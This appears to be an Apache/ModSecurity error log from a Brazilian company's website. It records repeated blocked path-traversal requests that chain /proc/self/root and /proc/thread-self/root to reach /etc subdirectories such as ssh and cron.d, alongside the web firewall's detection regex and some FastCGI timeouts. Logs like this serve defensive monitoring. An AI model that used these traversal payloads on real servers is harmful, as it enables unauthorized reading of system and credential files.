[Thu Mar 19 06:15:01.383142 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:44268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-leyqAr6etmhZHNo_CQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:15:07.694504 2026] [:error] [pid 19093:tid 140411658000128] [client 74.7.243.128:44284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-m1_V7PWP6ixUYl6W5AAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:15:13.130984 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:55118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-oeoXxyEfFpUF8f_rIwAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:15:19.045887 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34754] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:15:19.473059 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:52006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-p9a6ubjKNq_cu4YgwgAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:15:29.212392 2026] [:error] [pid 19093:tid 140411716749056] [client 74.7.243.128:52012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-sV_V7PWP6ixUYl6W8AAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:15:32.787753 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:56192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-tOyqAr6etmhZHNo_FgAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:15:36.191585 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:56194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-uOoXxyEfFpUF8f_rNAAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:15:39.202107 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.243.128:56206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-u1_V7PWP6ixUYl6XAAAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:15:42.121864 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35416] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:15:43.303052 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:48202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-v8df6f5d65gmYZRPgwAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:15:46.543290 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.228.61:38006] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu-wvu8EFLIOrSqIpt7pgAAAkY"]
[Thu Mar 19 06:15:47.547641 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:48218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-w8df6f5d65gmYZRPhwAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:15:49.343218 2026] [:error] [pid 27293:tid 140411725141760] [client 74.7.243.128:48228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-xf-YZRR_7pZ7nDJo6gAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:15:57.944458 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.243.128:53308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-zP-YZRR_7pZ7nDJo9AAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:16:00.179084 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:49428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-z9a6ubjKNq_cu4Yg2QAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:16:03.152016 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35970] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:16:25.128611 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36546] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:16:47.125798 2026] [proxy_fcgi:error] [pid 27403:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37080] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:16:48.163601 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.243.128:49440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_ABkFeYa1D6dYQnDK_AAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:17:05.270226 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:51282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_EQkwaGbbGflqUZCUQAAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:17:10.069817 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37640] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:17:15.260290 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:41066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_G-yqAr6etmhZHNo_RgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:17:17.102995 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:49980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_Hcdf6f5d65gmYZRPswAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:17:18.939833 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:49984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_Hvu8EFLIOrSqIpt74QAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:17:25.031181 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:47188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_Jda6ubjKNq_cu4YhRAAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:17:26.727046 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:47192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu_Jta6ubjKNq_cu4YhRgAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:17:35.133857 2026] [proxy_fcgi:error] [pid 27403:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:38180] AH01075: Error dispatching request to : (polling)
